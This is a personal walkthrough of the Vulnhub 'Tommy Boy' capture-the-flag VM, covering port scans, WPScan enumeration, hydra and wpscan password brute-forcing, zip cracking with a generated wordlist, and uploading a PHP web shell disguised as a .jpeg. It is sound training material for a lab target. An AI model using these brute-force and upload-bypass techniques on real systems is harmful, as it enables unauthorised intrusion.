Another day, another Vulnhub CTF.

I can see this becoming a bit of an addiction — but it’s a good thing because it’s an addiction which actually stands a chance of materially benefitting me with the new skills I’m picking up. Compared to playing Destiny, for instance. But in fairness that’s not for my benefit — I’m protecting The Last City from the Darkness.

Anyway.

This CTF, Tommy Boy, has been created by Brian Johnson of 7 Minute Security. It was a really fun VM — a few bits of it were fairly easy, some parts of it were really tricky, and there were some pretty neat little tricks in there too. And, running through it was a nice BOfH theme. Niiiice.

SPOILER ALERT

Herein lies a detailed walkthrough of everything I did to crack the VM. If you’re still working on it you should probably stop reading, unless you’re really stuck.

This isn’t necessarily the best or even a good way of breaking this VM, it’s just the way that worked for me.

Flag 1

Standard start — let’s find out where the VM is sat on the NAT-network:

arp-scan -l

Gives us 10.0.2.6.

Next up, let’s see what’s listening:

nmap -A -O -Pn 10.0.2.6

So, of interest we have:

port 22 running SSH

port 80 running http

port 8008 running http

And we’ve got a few interesting links:

6packsofb…soda

lukeiamyourfather

lookalivelowbridge

flag-numero-uno.txt

A quick browse to the port 80 http service shows us what we were told in the narrative:

Let’s grab that first flag:

Flag 1 - B34rcl4ws

Flag 2

What’s in /lukeiamyourfather?

Just sass?

bin walk -B tif.jpg

Yep, just sass.

What about /lookalivelowbridge?

In-joke from the film? Who knows. But there was nothing hidden in this picture either.

Last one — /6packsofb…soda

Again, nothing I’m picking up here but I am sort of getting worried that there might be a bit of ‘insider knowledge’ required from the film — which I haven’t seen. Let’s press on.

My next step was to have a proper scan of the web server.

nikto -h 10.0.2.6

but this just spat out hundreds of hits on folder names — I guess this was a nice deliberate seeding of red herrings. Well played, Mr Johnson!

Next I took a look at the main page again — to see if there’s anything in the source

Some more sass going on here, some real BOfH shenanigans! But in there is a YouTube link — which looks like it’s from the film — which has a guy simply say “prehistoric forest”.

Browsing to /prehistoricforest gives us…a Wordpress blog!

Since I don’t have an account yet all I can do is really browse through the posts. Looking in the post announcing the company blog we find a reference to Flag 2.

Adding that file to the blog’s URL, gives us the actual flag

Flag 2 - Z4l1nsky

Flag 3

Let’s keeping digging around. Little did I know at this stage that Flag 3 was going to take me an absolute AGE to find.

another URI to have a peak at.

Another picture which looks like a still from the film. And nothing obvious I can google about it.

I caved and looked up the film and tried to determine if this picture was trying to give me a clue. I played around with the actor name. Tried to find any pertinent quotes, but having not seen the film I was seriously hamstrung.

I contacted the author on Twitter and asked if I needed insider knowledge — thankfully he confirmed that I didn’t, so it’s time to try a bit harder.

A look in the head of the picture file (something I am now in the habit of routinely doing, alongside using binwalk) showed something a little odd — what looked like an MD5 hash (I appear to have built myself an MD5 detector as a result of my playing with these CTFs…)

ce154b5a8e59c89732bc25d6a2e6b90b

This reverses to ‘spanky’.

At the minute the only obvious thing I can think to do with these things is try to log in to the ssh server using guessed names like ‘richard’, ‘michelle’, and ‘nick’. Sadly, none of those are getting me anywhere.

Time for some wpscan then.



_______________________________________________________________

__ _______ _____

\ \ / / __ \ / ____|

\ \ /\ / /| |__) | (___ ___ __ _ _ __

\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \

\ /\ / | | ____) | (__| (_| | | | |

\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team

Version 2.9.1

Sponsored by Sucuri -

@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_

_______________________________________________________________

[+] URL:

[+] Started: Mon Aug 1 12:35:27 2016

[!] The WordPress 'http://10.0.2.6/prehistoricforest/readme.html' file exists exposing a version number

[+] Interesting header: LINK: <http://10.0.2.6/prehistoricforest/wp-json/>; rel="https://api.w.org/"

[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)

[+] XML-RPC Interface available under:

[!] Includes directory has directory listing enabled:

[+] WordPress version 4.5.3 identified from advanced fingerprinting (Released on 2016-06-21)

[+] WordPress theme in use: twentysixteen - v1.2

[+] Name: twentysixteen - v1.2

| Latest version: 1.2 (up to date)

| Location:

| Readme:

| Style URL:

| Theme Name: Twenty Sixteen

| Theme URI:

| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthe...

| Author: the WordPress team

| Author URI:

[+] Enumerating installed plugins (only ones with known vulnerabilities) ...

Time: 00:00:01 <==============================================================================> (1351 / 1351) 100.00% Time: 00:00:01

[+] We found 1 plugins:

[+] Name: akismet

| Latest version: 3.1.11

| Location:

[!] We could not determine a version so all vulnerabilities are printed out

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)

Reference:

Reference:

Reference:

[i] Fixed in: 3.1.5

[+] Finished: Mon Aug 1 12:35:32 2016

[+] Requests Done: 1403

[+] Memory used: 138.699 MB

[+] Elapsed time: 00:00:05

root@kali:~# root@kali:~# wpscan -e vp -u 10.0.2.6/prehistoricforest_________________________________________________________________ _______ _____\ \ / / __ \ / ____|\ \ /\ / /| |__) | (___ ___ __ _ _ __\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \\ /\ / | | ____) | (__| (_| | | | |\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 2.9.1Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart________________________________________________________________[+] URL: http://10.0.2.6/prehistoricforest/ [+] Started: Mon Aug 1 12:35:27 2016[!] The WordPress 'http://10.0.2.6/prehistoricforest/readme.html' file exists exposing a version number[+] Interesting header: LINK: ; rel="https://api.w.org/"[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)[+] XML-RPC Interface available under: http://10.0.2.6/prehistoricforest/xmlrpc.php [!] Includes directory has directory listing enabled: http://10.0.2.6/prehistoricforest/wp-includes/ [+] WordPress version 4.5.3 identified from advanced fingerprinting (Released on 2016-06-21)[+] WordPress theme in use: twentysixteen - v1.2[+] Name: twentysixteen - v1.2| Latest version: 1.2 (up to date)| Location: http://10.0.2.6/prehistoricforest/wp-content/themes/twentysixteen/ | Readme: http://10.0.2.6/prehistoricforest/wp-content/themes/twentysixteen/readme.txt | Style URL: http://10.0.2.6/prehistoricforest/wp-content/themes/twentysixteen/style.css | Theme Name: Twenty Sixteen| Theme URI: https://wordpress.org/themes/twentysixteen/ | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthe...| Author: the WordPress team| Author URI: https://wordpress.org/ [+] Enumerating installed plugins (only ones with known vulnerabilities) ...Time: 00:00:01 <==============================================================================> (1351 / 1351) 100.00% Time: 00:00:01[+] We found 1 plugins:[+] Name: akismet| Latest version: 3.1.11| Location: http://10.0.2.6/prehistoricforest/wp-content/plugins/akismet/ [!] We could not determine a version so all vulnerabilities are printed out[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)Reference: https://wpvulndb.com/vulnerabilities/8215 Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/ Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html [i] Fixed in: 3.1.5[+] Finished: Mon Aug 1 12:35:32 2016[+] Requests Done: 1403[+] Memory used: 138.699 MB[+] Elapsed time: 00:00:05root@kali:~#

Nothing there coming from the vulnerable plugin enumeration.

How about users (which I should probably have done earlier, really):



_______________________________________________________________

__ _______ _____

\ \ / / __ \ / ____|

\ \ /\ / /| |__) | (___ ___ __ _ _ __

\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \

\ /\ / | | ____) | (__| (_| | | | |

\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team

Version 2.9.1

Sponsored by Sucuri -

@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_

_______________________________________________________________

[+] URL:

[+] Started: Mon Aug 1 12:36:58 2016

[!] The WordPress 'http://10.0.2.6/prehistoricforest/readme.html' file exists exposing a version number

[+] Interesting header: LINK: <http://10.0.2.6/prehistoricforest/wp-json/>; rel="https://api.w.org/"

[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)

[+] XML-RPC Interface available under:

[!] Includes directory has directory listing enabled:

[+] WordPress version 4.5.3 identified from advanced fingerprinting (Released on 2016-06-21)

[+] WordPress theme in use: twentysixteen - v1.2

[+] Name: twentysixteen - v1.2

| Latest version: 1.2 (up to date)

| Location:

| Readme:

| Style URL:

| Theme Name: Twenty Sixteen

| Theme URI:

| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthe...

| Author: the WordPress team

| Author URI:

[+] Enumerating plugins from passive detection ...

[+] No plugins found

[+] Enumerating usernames ...

[+] Identified the following 4 user/s:

+----+----------+-------------------+

| Id | Login | Name |

+----+----------+-------------------+

| 1 | richard | richard |

| 2 | tom | Big Tom |

| 3 | tommy | Tom Jr. |

| 4 | michelle | Michelle Michelle |

+----+----------+-------------------+

[+] Finished: Mon Aug 1 12:37:01 2016

[+] Requests Done: 57

[+] Memory used: 15.766 MB

[+] Elapsed time: 00:00:03

root@kali:~# root@kali:~# wpscan -e u -u 10.0.2.6/prehistoricforest_________________________________________________________________ _______ _____\ \ / / __ \ / ____|\ \ /\ / /| |__) | (___ ___ __ _ _ __\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \\ /\ / | | ____) | (__| (_| | | | |\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 2.9.1Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart________________________________________________________________[+] URL: http://10.0.2.6/prehistoricforest/ [+] Started: Mon Aug 1 12:36:58 2016[!] The WordPress 'http://10.0.2.6/prehistoricforest/readme.html' file exists exposing a version number[+] Interesting header: LINK: ; rel="https://api.w.org/"[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)[+] XML-RPC Interface available under: http://10.0.2.6/prehistoricforest/xmlrpc.php [!] Includes directory has directory listing enabled: http://10.0.2.6/prehistoricforest/wp-includes/ [+] WordPress version 4.5.3 identified from advanced fingerprinting (Released on 2016-06-21)[+] WordPress theme in use: twentysixteen - v1.2[+] Name: twentysixteen - v1.2| Latest version: 1.2 (up to date)| Location: http://10.0.2.6/prehistoricforest/wp-content/themes/twentysixteen/ | Readme: http://10.0.2.6/prehistoricforest/wp-content/themes/twentysixteen/readme.txt | Style URL: http://10.0.2.6/prehistoricforest/wp-content/themes/twentysixteen/style.css | Theme Name: Twenty Sixteen| Theme URI: https://wordpress.org/themes/twentysixteen/ | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthe...| Author: the WordPress team| Author URI: https://wordpress.org/ [+] Enumerating plugins from passive detection ...[+] No plugins found[+] Enumerating usernames ...[+] Identified the following 4 user/s:+----+----------+-------------------+| Id | Login | Name |+----+----------+-------------------+| 1 | richard | richard || 2 | tom | Big Tom || 3 | tommy | Tom Jr. || 4 | michelle | Michelle Michelle |+----+----------+-------------------+[+] Finished: Mon Aug 1 12:37:01 2016[+] Requests Done: 57[+] Memory used: 15.766 MB[+] Elapsed time: 00:00:03root@kali:~#

Some users! Great news.

Trying the flags I’ve found so far as passwords for those users were unsuccessful and I didn’t have any joy with any of the other clues either.

Running:

wpscan -u 10.0.2.6/prehistoricforest --username tom --wordlist /usr/share/wordlists/rockyou.txt --threads 50

Gave me:

Password for user ‘tom’ is ‘tomtom1’.

Running the same for tommy ran to an hour before I abandoned it — and I didn’t try the others as it seemed like there were diminishing returns.

In the meantime, I logged in to the Wordpress site as ‘tom’ and found this.

A clue saying this his ssh password ends in ‘1938!!’ — that’ll come in useful.

Also worth noting that I can’t log in to ssh as tom using any of the existing passwords or clues I’ve found with this appended to the end.

My next step was to see if this clue about the suffix was enough to get me into the ssh server through some brute forcing. I modified the contents of rockyou.txt (in the /usr/share/wordlists folder on Kali) to append ‘1938!!’:

for word in $(cat words); do echo $word'1938!!' >> words2; done

Before this completed I actually ran out of memory — it looked like it got about half way through the input file.

Then I tried:

hydra -s 22 -l tom -P words2 10.0.2.6 ssh

But this got me nothing.

A bit defeated I started going back over my old notes for some loose threads.

I remembered that there was a post on the Wordpress site which was password protected so I had a play around with that. Since my brute force attempts weren’t really going anywhere with ssh passwords I didn’t bother trying anything freaky — just going over what I have as solid clues.

It turns out that ‘spanky’ from the ‘richard’ picture was the password here and now find this:

This is f’d up. I am currently working to restore the company’s online ordering system, but we are having some problems getting it restored from backup. Unfortunately, only Big Tom had the passwords to log into the system. I can’t find his passwords anywhere. All I can find so far is a note from our IT guy Nick (whose last day was yesterday) saying: Hey Richy, So you asked me to do a write-up of everything I know about the Callahan server so the next moron who is hired to support you idiots can get up to speed faster. Here’s everything I know: You guys are all hopeless sheep :-/ The Callahan Auto Web site is usually pretty stable. But if for some reason the page is ever down, you guys will probably go out of business. But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again. IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore. Warning: Big Tom always forgets his account password. Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called. Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out. I left a few other bits of information in my home folder, which the new guy can access via FTP. Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it. Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for. And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again. Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?). You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password. I removed my SSH access because I *DON’T* want you calling me in case of an emergency. But my creds still work on FTP. Your new fresh fish can connect using my credentials and if he/she has half a brain. Good luck, schmucks! LOL -Nick Michelle/Tommy…WTF are we going to do?!?! If this site stays down, WE GO OUT OF BUSINESS!!!1!!1!!!!!!! -Richard

At this point Pete had been mentioning some kind of mythical FTP server he’d found that I had so far not seen. This explained it! The server goes up/down on 15 minute cycles. So I had obviously been scanning at the wrong times and never saw it.

We also have a clue that the FTP user is ‘nickburns’ with a ‘VERY easy’ password.

Let’s look into the FTP server a bit then.

Running:

nmap -p1-65534 10.0.2.6

finally gave me a result on 65534.

FTP’ing to the server works without hindrance, so now I just need some ‘VERY easy’ passwords.

My first port of call was to google for the most popular passwords and download some files.

Armed with them, I set about brute forcing some more

hydra -t 1 -l nickburns -P passwords.txt -vV -s 65534 10.0.2.6 ftp

Annoyingly, I spent a whole evening (until waaaay past 12) running 15 minute increments of brute forcing using pretty much all of the ‘common’ files I could find in Kali or on the internet. I ended up running incremental passes through rockyou.txt — and since hydra didn’t want to -R resume, I was removing the entries from the passwords file using vim.

The following day the obviousness of the solution hit me hard in the face: if it’s VERY easy and not in a common password list that means it’s either blank or the same as the user name…

So yep,

nickburns:nickburns

Logging in…

root@kali:~# ftp 10.0.2.6 65534

Connected to 10.0.2.6.

220 Callahan_FTP_Server 1.3.5

Name (10.0.2.6:root): nickburns

331 Password required for nickburns

Password:

230 User nickburns logged in

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls

200 PORT command successful

150 Opening ASCII mode data connection for file list

-rw-rw-r — 1 nickburns nickburns

977 Jul 15 02:37 readme.txt

226 Transfer complete

ftp> get readme.txt

local: readme.txt remote: readme.txt

200 PORT command successful

150 Opening BINARY mode data connection for readme.txt (977 bytes)

226 Transfer complete

977 bytes received in 0.00 secs (195.1128 kB/s)

And then cat’ing out the readme.txt file I found:

root@kali:~# cat readme.txt To my replacement: If you're reading this, you have the unfortunate job of taking over IT responsibilities from me here at Callahan Auto. HAHAHAHAHAAH! SUCKER! This is the worst job ever! You'll be surrounded by stupid monkeys all day who can barely hit Ctrl+P and wouldn't know a fax machine from a flame thrower! Anyway I'm not completely without mercy. There's a subfolder called "NickIzL33t" on this server somewhere. I used it as my personal dropbox on the company's dime for years. Heh. LOL. I cleaned it out (no naughty pix for you!) but if you need a place to dump stuff that you want to look at on your phone later, consider that folder my gift to you. Oh by the way, Big Tom's a moron and always forgets his passwords and so I made an encrypted .zip of his passwords and put them in the "NickIzL33t" folder as well. But guess what? He always forgets THAT password as well. Luckily I'm a nice guy and left him a hint sheet. Good luck, schmuck! LOL. -Nick root@kali:~#

I tried this out from all of the URIs I had but wasn’t getting anywhere, so I decided to have a look at the server showing on port 8008 — that might be what was meant by the ‘personal dropbox’ server.

And here it is:

Now then, I have to admit that this “Steve Jobs” reference escaped me for FAR too long. Instead I was trying to manually find Apple-related sub-folders which was getting me nowhere.

Turns out it’s frustratingly simple — I just need to appear to be coming from an Apple device to see the files. Cunning.

Yeah, rub it in!

This sounds like a job for dirbuster!

aaaand, FAIL.

WTF? Time passes. I wish I had a beer.

Remember, like, minutes ago when you figured out you need a specific User Agent to access this stuff? Yeah, dumbass.

Remembering: powerful

I took the User Agent string straight out of the User Agent Switcher that I used on Firefox.

I’m not sure what was going on with dirbuster — I think it was the accented characters it was dealing with but it was erroring out a lot and pausing the attack.

I continued to allow it to run a few times which was luckily enough to get a hit:

Note the errors — WTF?

Browsing there gives us tonnes more info:

Firstly, it’s given us Flag 3:

Flag 3 — TinyHead

Flag 4

The encrypted password backup allows me to download a zip file.

Linked within the hint file:

Big Tom, Your password vault is protected with (yep, you guessed it) a PASSWORD! And because you were choosing stupidiculous passwords like "password123" and "brakepad" I enforced new password requirements on you...13 characters baby! MUAHAHAHAHAH!!! Your password is your wife's nickname "bev" (note it's all lowercase) plus the following: * One uppercase character

* Two numbers

* Two lowercase characters

* One symbol

* The year Tommy Boy came out in theaters Yeah, fat man, that's a lot of keys to push but make sure you type them altogether in one big chunk ok? Heh, "big chunk." A big chunk typing big chunks. That's funny. LOL -Nick

Ugh, what a mess. Not sure how to answer that requirement for building a complex password other than through The Hard Way™.

#!/bin/bash for UC in $(echo {A..Z});

do

for N in $(echo {00..99});

do

for LC in $(echo {a..z});

do

for L2 in $(echo {a..z});

do

for SY in $(echo \# \$ \% \& \' \( \) \* \+ \, \- \. \/ \: \; \< \= \< \? \@ \[ \\ \] \^ \_ \{ \| \} \~);

do

echo 'bev'$UC$N$LC$L2$SY'1995';

done

done

done

done

done

I saved this as passgen.sh and then changed its permissions to allow me to run it:

chmod u+x passgen.sh

and then output it into a brute force for zip file

./passgen.sh > bfforzip.txt

This took a loooooong time to output. But there are 68,029,332 entries in the file…

Anyway, I tried to write a simple bash script to automate the application of passwords to the unzip command (against the -P for password flag) but the results were erratic and I couldn’t figure out what was going wrong.

Google told me to use fcrackzip

root@kali:~/ctf/tommy-boy#

fcrackzip -D -u -p bfforzip.txt ~/Downloads/t0msp4ssw0rdz.zip

PASSWORD FOUND!!!!: pw == bevH00tr$1995

root@kali:~/ctf/tommy-boy#

Woo!

Extracting the zip gives me a passwords.txt file which contains some more details and sass:

root@kali:~/Downloads# cat passwords.txt

Sandusky Banking Site

— — — — — — — — — — — —

Username: BigTommyC

Password: money

TheKnot.com (wedding site)

— — — — — — — — — — — — — -

Username: TomC

Password: wedding

Callahan Auto Server

— — — — — — — — — — — — — —

Username: bigtommysenior

Password: fatguyinalittlecoat

Note: after the “fatguyinalittlecoat” part there are some numbers, but I don’t remember what they are.

However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog

— — — — — — — — — — — — — —

Username: bigtom(I think?)

Password: ???

Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

root@kali:~/Downloads#

Finally! The bloody ssh password for tom! As well as the actual username which was hinted at as being non-standard earlier on.



bigtommysenior@10.0.2.6's password:

Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-31-generic x86_64)

* Documentation:

143 packages can be updated.

0 updates are security updates.

Last login: Thu Jul 14 13:45:57 2016

bigtommysenior@CallahanAutoSrv01:~$ ll

total 40

drwxr-x--- 4 bigtommysenior bigtommysenior 4096 Jul 8 08:57 ./

drwxr-xr-x 5 root root 4096 Jul 7 00:17 ../

-rw------- 1 bigtommysenior bigtommysenior 0 Jul 21 17:47 .bash_history

-rw-r--r-- 1 bigtommysenior bigtommysenior 220 Jul 7 00:12 .bash_logout

-rw-r--r-- 1 bigtommysenior bigtommysenior 3771 Jul 7 00:12 .bashrc

drwx------ 2 bigtommysenior bigtommysenior 4096 Jul 7 00:16 .cache/

-rw-r--r-- 1 bigtommysenior bigtommysenior 307 Jul 7 14:18 callahanbak.bak

-rw-rw-r-- 1 bigtommysenior bigtommysenior 237 Jul 7 15:27 el-flag-numero-quatro.txt

-rw-rw-r-- 1 bigtommysenior bigtommysenior 630 Jul 7 17:59 LOOT.ZIP

drwxrwxr-x 2 bigtommysenior bigtommysenior 4096 Jul 7 13:50 .nano/

-rw-r--r-- 1 bigtommysenior bigtommysenior 675 Jul 7 00:12 .profile

-rw-r--r-- 1 bigtommysenior bigtommysenior 0 Jul 7 00:17 .sudo_as_admin_successful root@kali:~/Downloads# ssh bigtommysenior@10.0.2.6bigtommysenior@10.0.2.6's password:Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-31-generic x86_64)* Documentation: https://help.ubuntu.com/ 143 packages can be updated.0 updates are security updates.Last login: Thu Jul 14 13:45:57 2016bigtommysenior@CallahanAutoSrv01:~$ lltotal 40drwxr-x--- 4 bigtommysenior bigtommysenior 4096 Jul 8 08:57 ./drwxr-xr-x 5 root root 4096 Jul 7 00:17 ../-rw------- 1 bigtommysenior bigtommysenior 0 Jul 21 17:47 .bash_history-rw-r--r-- 1 bigtommysenior bigtommysenior 220 Jul 7 00:12 .bash_logout-rw-r--r-- 1 bigtommysenior bigtommysenior 3771 Jul 7 00:12 .bashrcdrwx------ 2 bigtommysenior bigtommysenior 4096 Jul 7 00:16 .cache/-rw-r--r-- 1 bigtommysenior bigtommysenior 307 Jul 7 14:18 callahanbak.bak-rw-rw-r-- 1 bigtommysenior bigtommysenior 237 Jul 7 15:27 el-flag-numero-quatro.txt-rw-rw-r-- 1 bigtommysenior bigtommysenior 630 Jul 7 17:59 LOOT.ZIPdrwxrwxr-x 2 bigtommysenior bigtommysenior 4096 Jul 7 13:50 .nano/-rw-r--r-- 1 bigtommysenior bigtommysenior 675 Jul 7 00:12 .profile-rw-r--r-- 1 bigtommysenior bigtommysenior 0 Jul 7 00:17 .sudo_as_admin_successful bigtommysenior@CallahanAutoSrv01:~$ cat el-flag-numero-quatro.txt

YAY! Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal working status.

Flag data: EditButton

But...but...where's flag 5?

I'll make it easy on you. It's in the root of this server at /5.txt

bigtommysenior@CallahanAutoSrv01:~$

Flag 4 — EditButton

Flag 5

I’m pretty sure I read something saying that all I needed to do was to rename the .bak file to index.html and that would restore the main site.

I tried that, but the site remained stubbornly down so I had to go and take a look in the /var/www folder to see what’s up.

Sure enough the index.html file in there wasn’t linked to anywhere so I replaced it with my renamed backup file — et voila!

I think this means we’re back in business :)

But, I still don’t have Flag 5 :(

bigtommysenior@CallahanAutoSrv01:/$ cat .5.txt

cat: .5.txt: Permission denied

bigtommysenior@CallahanAutoSrv01:/$

Also interesting to note that this file was owned by www-data which was a bit odd. Basically, I’m not getting it that way.

However, on my travels in /var I did notice another folder which looked a bit out of place:

/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS

Looks like some kind of file upload functionality with an /uploads/ folder that looks like it has way too much permission going on.

I wonder whether I was supposed to find this folder this way? Maybe, looking back I was supposed to use something like Burp to brute force subfolders beneath /NickIzL33t/? Who knows, but I’m here anyay.

Browsing to the uploader shows a pretty simple upload page.

I’m able to upload images

And note that they go into /uploads/, our wildly over-permissioned folder.

Webshell then!

I tried to upload the simple-backdoor.php file

but there was no way.

Or was there?

mv simple-backdoor.php simple-backdoor.php.jpeg

Yep — worked a charm.

Now, back on the ssh account to rename the file back to .php and

I can execute commands, so (note: spaces need to be encoded as %20 to allow this to work):

Flag 5 — Buttcrack

Flag 5+1

A bonus flag to crack.

Simple one here — just to check no one’s skipped any steps :)

Concatenating the flag contents gives me:

B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

and unzipping the LOOT.ZIP

And we are home!

Thanks to Brian Johnson for a great CTF.

A few of outstanding items on my to-do list that I couldn’t square off though: